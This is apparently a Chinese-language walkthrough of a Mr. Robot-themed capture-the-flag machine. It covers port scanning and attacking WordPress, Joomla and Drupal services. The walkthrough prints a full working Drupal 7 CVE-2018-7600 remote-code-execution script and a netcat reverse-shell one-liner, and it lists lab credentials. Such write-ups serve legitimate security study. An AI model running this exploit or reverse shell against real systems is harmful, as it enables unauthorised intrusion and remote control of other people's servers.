nmap扫描端口:
![https://s4.ax1x.com/2022/02/22/bS20kn.png](https://s4.ax1x.com/2022/02/22/bS20kn.png)
开放5000端口,8081端口,9001端口。
80端口:
![https://s4.ax1x.com/2022/02/22/bpPZ5j.png](https://s4.ax1x.com/2022/02/22/bpPZ5j.png)
5000端口(wordpress):
![https://s4.ax1x.com/2022/02/22/bpPhsf.png](https://s4.ax1x.com/2022/02/22/bpPhsf.png)
8081端口(joomla):
![https://s4.ax1x.com/2022/02/22/bpimwD.png](https://s4.ax1x.com/2022/02/22/bpimwD.png)
9001端口(drupal):
![https://s4.ax1x.com/2022/02/22/bpit0S.png](https://s4.ax1x.com/2022/02/22/bpit0S.png)
![https://s4.ax1x.com/2022/02/22/bpiRk4.png](https://s4.ax1x.com/2022/02/22/bpiRk4.png)
drupal7版本存在一个rce,exploit:
#!/usr/bin/env python3
import requests
import argparse
from bs4 import BeautifulSoup
def get_args():
parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''
This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
by poisoning the recover password form (user/password) and triggering it with
the upload file via ajax (/file/ajax).
''')
parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
args = parser.parse_args()
return args
def pwn_target(target, function, command, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
print('[*] Poisoning a form and including it in cache.')
get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, "html.parser")
try:
form = soup.find('form', {'id': 'user-pass'})
form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
if form_build_id:
print('[*] Poisoned form ID: ' + form_build_id)
print('[*] Triggering exploit to execute: ' + command)
get_params = {'q':'file/ajax/name/#value/' + form_build_id}
post_params = {'form_build_id':form_build_id}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
parsed_result = r.text.split('[{"command":"settings"')[0]
print(parsed_result)
except:
print("ERROR: Something went wrong.")
raise
def main():
print ()
print ('=============================================================================')
print ('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')
print ('| by pimps |')
print ('=============================================================================\n')
args = get_args() # get the cl args
pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
if __name__ == '__main__':
main()
反弹shell:
![https://s4.ax1x.com/2022/02/22/bpFUu6.png](https://s4.ax1x.com/2022/02/22/bpFUu6.png)
本想上传文件直接反弹,但是没有权限写入文件:
![https://s4.ax1x.com/2022/02/22/bpkCx1.png](https://s4.ax1x.com/2022/02/22/bpkCx1.png)
只能直接反弹shell:
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.0.16 1234 >/tmp/f
成功连接到shell:
![https://s4.ax1x.com/2022/02/22/bpkNGj.png](https://s4.ax1x.com/2022/02/22/bpkNGj.png)
![https://s4.ax1x.com/2022/02/22/bpkHFe.png](https://s4.ax1x.com/2022/02/22/bpkHFe.png)
用户名:tyrell
密码:mR_R0bo7_i5_R3@!_
提权:
![https://s4.ax1x.com/2022/02/22/bpElE8.png](https://s4.ax1x.com/2022/02/22/bpElE8.png)
joomla的密码在/opt文件下的8081.cred:
![https://s4.ax1x.com/2022/02/22/bpVKz9.png](https://s4.ax1x.com/2022/02/22/bpVKz9.png)
![https://s4.ax1x.com/2022/02/22/bpV1qx.png](https://s4.ax1x.com/2022/02/22/bpV1qx.png)
![https://s4.ax1x.com/2022/02/22/bpV8Z6.png](https://s4.ax1x.com/2022/02/22/bpV8Z6.png)
elliot的用户名和密码在用户列表中。